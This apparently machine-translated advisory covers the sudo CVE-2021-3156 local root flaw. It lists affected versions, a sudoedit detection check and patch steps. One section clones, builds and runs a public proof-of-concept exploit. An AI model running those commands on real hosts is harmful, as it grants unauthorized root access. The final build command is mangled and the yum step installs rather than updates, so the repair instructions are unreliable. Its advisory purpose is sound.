Vulnerability description:

On January 27, 2021, RedHat officially announced the risk of sudo buffer/stack overflow vulnerability. Common users can exploit this vulnerability to obtain root permissions without authentication. The vulnerability POC has been published on the Internet to remind Linux system administrators to fix it as soon as possible.

Vulnerability level: Critical

Affected version:

Sudo: 1.8.2-1.8.31 p2

Sudo: 1.9.0-1.9.5 p1

Vulnerability recurrence:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 1
Copy the code

Kali Linux relive:

 

Ubuntu – 20.04.1 repetition:

 

 

 

Detection method:

Log in to the system as the non-root user and run the following command:

sudoedit -s /
Copy the code

– Responding to an error starting with sudoEdit: indicates a vulnerability.

[admin@Q01 ~]$ sudoedit -s /
sudoedit: /: not a regular file
Copy the code

– If you respond with an error beginning with Usage:, the patch has taken effect.

[admin@Q02 ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...
Copy the code

Repair suggestions:

Sudo yum -y install sudo

Method 2: Download the software package and install Sudo 1.9.5P2 or later

Download the sudo package at www.sudo.ws/dist/

Wget https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz tar - ZXVF sudo - 1.9.5 p2. Tar. Gz CD sudo - 1.9.5 p2 &. / configure make && make installCopy the code